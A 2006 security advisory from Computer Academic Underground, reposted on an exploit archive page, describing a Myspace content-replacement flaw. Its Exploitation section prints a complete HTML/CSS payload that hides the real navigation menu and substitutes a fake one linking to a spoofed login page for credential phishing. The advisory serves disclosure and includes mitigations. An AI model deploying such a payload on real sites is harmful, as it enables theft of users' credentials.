Computer Academic Underground Advisory 2006.1

Computer Academic Underground Advisory 2006.1: Posted Nov 19, 2006; Authored by I)ruid, Computer Academic Underground, int3l | Site caughq.org; Myspace.com's navigation menu can be replaced with a malicious menu via CSS code in the attacker's profile.; tags | advisory; SHA-256 | a3b9d50ae789cce4e96929980808df6b3eace71418a5cdfe6a186d22f8dae2b8; Download | Favorite | View

Computer Academic Underground Advisory 2006.1

                      ____      ____     __    __
                     /    \    /    \   |  |  |  |
        ----====####/  /\__\##/  /\  \##|  |##|  |####====----
                   |  |      |  |__|  | |  |  |  |
                   |  |  ___ |   __   | |  |  |  |
  ------======######\  \/  /#|  |##|  |#|  |##|  |######======------
                     \____/  |__|  |__|  \______/
                                                     
                    Computer Academic Underground
                        http://www.caughq.org
                          Security Advisory 

===============/========================================================
Advisory ID:    CAU-2006-0001
Release Date:   11/16/2006
Title:          Myspace.com Trojaned Navigation Menu
Application/OS: Myspace.com Website
Topic:          Myspace.com's navigation menu can be replaced with a
                malicious menu via CSS code in the attacker's profile. 
Vendor Status:  Not Notified
Attributes:     Remote, Passive
Advisory URL:   http://www.caughq.org/advisories/CAU-2006-0001.txt
Author/Email:   int3l <int3l (at) caughq.org> 
                I)ruid <druid (at) caughq.org>
===============/========================================================

Overview
========

Myspace.com provides a site navigation menu near the top of every page.
Users generally use this menu to navigate to the various areas of the
website.  The first link that the menu provides is called "Home" which
navigates back to the user's personalized Myspace page which is
essentially the user's "home base" when using the site.  As such this 
particular link is used quite frequently and is used to return from 
other areas of the website, most importantly from other user's profile
pages. 

A content-replacement attack coupled with a spoofed Myspace login page
can be used to collect victim users' authentication credentials.  By
replacing the navigation menu on the attacker's Myspace profile page,
an unsuspecting victim may be redirected to an external site of the
attacker's choice, such as a spoofed Myspace login page.  Due to
Myspace.com's seemingly random tendency to expire user sessions or log
users out, a user being presented with the Myspace login page is not
out of the ordinary and does not raise much suspicion on the part of
the victim.


Impact
======

Users are unexpectedly redirected to a website of the attacker's
choice.

Users may be tricked into revealing their authentication credentials.


Affected Systems
================

Myspace.com: http://www.myspace.com


Technical Explanation
=====================

The following CSS code can be submitted to a user profile's "About Me"
section which will cause the Myspace navigation menu not to be
displayed:

   <style type="text/css">
   div table td font {display: none;}
   </style>

This allows the attacker to replace it with a malicious navigation menu
which may redirect users to an external site spoofing the Myspace login
page.  If the user is successfully tricked into believing that they must
re-authenticate, they will inadvertently reveal their authentication
credentials to the attacker.


Solution & Recommendations
==========================

Myspace should not allow users to add CSS code to their profiles via the
update profile form.  This restriction can be accomplished by rejecting
such submissions or stripping the code out of the form input when
submitted.

Users should always be aware of the URL information in their browser.

As a temporary work-around, users should not use the navigation bars
while viewing an untrusted user's Myspace profile.


Exploitation
============

Place this code in the "About Me" section of the attacker's Myspace
profile:

<style type="text/css">
div table td font {display: none;}
</style>

<div style="z-index:5; background-color:000000; position:absolute; top:125px; left:50%; margin-left:-395px; width:790px; height:15px;" align="center"><font color=><b></b></font><br>

<a href="http://www.example.com/login.html" target=""><font color=ffffff>Home</font></a> 
<font color=ff0099>   |</font>

<a href="http://browseusers.myspace.com/browse/browse.aspx?" target=""><font color=ffffff>Browse</font></a> 
<font color=ff0099>   |</font>

<a href="http://search.myspace.com/index.cfm?fuseaction=find" target=""><font color=ffffff>Search</font></a> 
<font color=ff0099>   |</font>

<a href="http://invite.myspace.com/index.cfm?fuseaction=invite" target=""><font color=ffffff>Invite</font></a> 
<font color=ff0099>   |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=film" target=""><font color=ffffff>Film</font></a> 
<font color=ff0099>   |</font>

<a href="http://messaging.myspace.com/index.cfm?fuseaction=mail.inbox" target=""><font color=ffffff>Mail</font></a> 
<font color=ff0099>   |</font>

<a href="http://blog.myspace.com/index.cfm?fuseaction=blog.controlcenter" target=""><font color=ffffff>Blog</font></a> 
<font color=ff0099>   |</font>

<a href="http://favorites.myspace.com/index.cfm?fuseaction=user.favorites" target=""><font color=ffffff>Favorites</font></a> 
<font color=ff0099>   |</font>

<a href="http://forum.myspace.com/index.cfm?fuseaction=messageboard.categories" target=""><font color=ffffff>Forum</font></a> 
<font color=ff0099>   |</font>

<a href="http://groups.myspace.com/index.cfm?fuseaction=groups.categories" target=""><font color=ffffff>Groups</font></a> 
<font color=ff0099>   |</font>

<a href="http://events.myspace.com/index.cfm?fuseaction=events" target=""><font color=ffffff>Events</font></a> 
<font color=ff0099>   |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=vids" target=""><font color=ffffff>Videos</font></a> 
<font color=ff0099>   |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=music" target=""><font color=ffffff>Music</font></a> 
<font color=ff0099>   |</font>

<a href="http://www.myspace.com/index.cfm?fuseaction=comedian.home" target=""><font color=ffffff>Comedy</font></a> 
<font color=ff0099>   |</font>

<a href="http://classifieds.myspace.com/index.cfm?fuseaction=classifieds" target=""><font color=ffffff>Classifieds</font></a> 
</div><style type="text/css">div div table tr td a.navbar, div div table tr td font {display: none;}</style> 


References
==========

Myspace.com: http://www.myspace.com


Credits & Gr33ts
================

CAU

Top Authors In Last 30 Days

Red Hat 305 files
Ubuntu 67 files
Debian 23 files
Gentoo 8 files
LiquidWorm 6 files
Apple 5 files
Google Security Research 5 files
Spencer McIntyre 3 files
Ivan Fratric 3 files
Jann Horn 2 files

File Archives

Systems

AIX (430)
Apple (2,133)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,177)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,160)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,495)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,025)
UNIX (9,482)
UnixWare (188)
Windows (6,786)
Other

Computer Academic Underground Advisory 2006.1

Computer Academic Underground Advisory 2006.1

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Computer Academic Underground Advisory 2006.1

Share This

Computer Academic Underground Advisory 2006.1

File Archive:

December 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems